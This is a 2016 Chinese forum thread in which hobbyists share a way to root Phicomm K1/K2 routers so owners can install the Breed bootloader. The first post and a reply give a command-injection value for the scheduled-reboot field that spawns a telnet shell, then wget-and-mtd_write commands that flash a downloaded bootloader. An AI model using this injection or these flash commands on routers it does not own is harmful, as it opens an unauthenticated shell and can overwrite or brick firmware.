找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
查看: 81285|回复: 522

k1 v22.4.xx.xx k2 v22.4.xx.xx固件免降级,免刷配置 刷机 刷breed 直接进telnet

 火... [复制链接]
本帖最后由 powerwheel 于 2016-12-21 11:03 编辑

上周买了个k1,固件是v22.4.2.15的发现还没办法刷机,论坛只有一种方法,还要刷配置,太麻烦了,周末在家没事就找了个漏洞,这个漏洞在k1 k2新版的固件中都存在,操作上也很简单,我搞了个录像,大家看下就明白了。理论上只要带定时重启功能的版本都可以这样操作
优酷
http://v.youku.com/v_show/id_XMTg3MzY2MjI1Mg==.html

优酷转码后不是很清晰,开启定时重启,里面输入的内容是: 01:00 | telnetd -l /bin/login.sh
百度云:
链接: https://pan.baidu.com/s/1kVDcCTp 密码: a3ai

telnet链接后执行以下命令就行了

1.cd /tmp
2.wget http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin
3.mtd_write write /tmp/breed-mt7620-phicomm-psg1208.bin Bootloader
4.reboot

k1 v22.4.2.15  k2 v22.4.5.39都存在这个漏洞,低版本的应该也都有的
刚才看了下k1s_v22.3.1.5 的固件,这个里面没有这个漏洞但是有很多其他的漏洞,开启telnet应该更容易
k2c 固件我没解开,估计不行,其他的版本我就不试了,大家试下,可以话就说下

a6版本已经有人测过了,也是可以的
https://www.right.com.cn/forum/thread-204435-1-1.html







点评

k2 v22.4.5.42 版本由此漏洞吗?  发表于 2016-12-26 11:00

评分

参与人数 13恩山币 +11 收起 理由
je*** + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
七彩*** + 1 第四步中的01,我的是00????一样修改吗??
huse*** + 1 楼主威武—我就想问问挖掘机技术哪家强?
duxi*** + 1 支付宝已转500w给你!
qq869*** -1 支付宝已转500w给你!
恩山论*** + 1 我来恩山就是为了看你!
qq1114*** + 1 一看就是觉得高端、大气、上档次!
159*** + 1 厉害了!!!
Kuc*** + 1 怀揽白富美的屌丝露出了惊讶的眼神:哥,你太帅了!
谁明*** + 1 支付宝已转500w给你!
航校门*** + 1 亲,你这么厉害,我想做你的经纪人!
laox*** + 1 支付宝已转500w给你!
sev*** + 1 虽然没试 但是这个如果是真的楼主就太牛了 先评分

查看全部评分

我的恩山、我的无线 The best wifi forum is right here.
这么牛,技术达人~~
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

22.4.6.3 可以?

点评

所有的都可以  详情 回复 发表于 2016-12-20 10:53
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

 楼主| | 显示全部楼层

所有的都可以

点评

你那里有这个固件文件没有,我看斐讯网站上没有下载地址,给我一个我测试下  详情 回复 发表于 2016-12-20 12:03
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

本帖最后由 航校门口二楼修 于 2016-12-20 11:03 编辑

厉害了我的哥 k2c不知道可不可以建议楼主设置回复可见要不然会沉得很快的

点评

你的是哪个版本的固件,我看下就知道了  详情 回复 发表于 2016-12-20 11:02
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

 楼主| | 显示全部楼层
航校门口二楼修 发表于 2016-12-20 10:54
厉害了我的哥 k2c不知道可不可以

你的是哪个版本的固件,我看下就知道了

点评

K2C没有V22.XX版本 K2C不提供固件更新,真是坑  详情 回复 发表于 2016-12-21 18:51
V21.4.6.12的 我没有这个路由器 我是替广大网友问问的。还有我转发了你的帖子,你帖子设置一下回复可见啊要不然会沉的。  详情 回复 发表于 2016-12-20 11:08
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

路过看看,不知道灵不灵
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

感谢楼主,让我的垃圾路由变废为宝了
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

powerwheel 发表于 2016-12-20 11:02
你的是哪个版本的固件,我看下就知道了

V21.4.6.12的 我没有这个路由器 我是替广大网友问问的。还有我转发了你的帖子,你帖子设置一下回复可见啊要不然会沉的。
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

回复可见要不然会沉得很快的
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

本帖最后由 AN_drew 于 2016-12-20 12:47 编辑

好厉害,把定时重启的01改成 01:00 | telnetd -l /bin/login.sh

点评

是 l 不是 t 01:00 | telnetd -l /bin/login.sh  详情 回复 发表于 2016-12-20 12:41
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

本帖最后由 liangcanming 于 2016-12-20 11:51 编辑

改成文字,谁试试
1.进入官方固件WEB界面 192.168.1.1/192.168.2.1
2.在官方WEB界面先择“重启”>“定时重启路由器”。
3.在浏览器打开“开发者工具”,用鼠标在官方WEB界面选择时间“01”。
4.在浏览器“开发者工具”中“01”代码修改为“01:00 | telnetd -l /bin/login.sh”。
5.在官方WEB界面直接“保存”。
6.直接用Telnet刷breed。
------------------------------------------------------------------
一.连网方法:
1.使用Putty,Xshell 5等软件,Telnet登录进路由器(4行代码).
------------------------------------------------------------------
1.cd /tmp
2.wget http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin
3.mtd_write write /tmp/breed-mt7620-phicomm-psg1208.bin Bootloader
4.reboot
------------------------------------------------------------------
二.本地方法:
1.使用Winscp软件scp方式进入路由器系统,将breed-mt7620-phicomm-psg1208.bin文件放入/tmp目录下.
2.使用Putty,Xshell 5等软件,Telnet登录进路由器(2行代码).
------------------------------------------------------------------
1.mtd_write write /tmp/breed-mt7620-phicomm-psg1208.bin Bootloader
2.reboot
------------------------------------------------------------------

点评

第四步中的01,我的是00????一样修改吗??  详情 回复 发表于 2017-2-20 13:34
winscp 或putty登录用户名和密码是多少???root adim  详情 回复 发表于 2016-12-25 11:08
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

Dioxide fending ng
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

如果真可以这样,那太神了,支持
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

K2 telnet 用户名密码 是那一个?
admin/admin
root/root
?

点评

直接就能进去吧  详情 回复 发表于 2016-12-20 11:30
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

欢迎大家光临恩山无线论坛上一条 /1 下一条

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2024-4-29 22:00

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com 举报电话:0519-86695797

快速回复 返回顶部 返回列表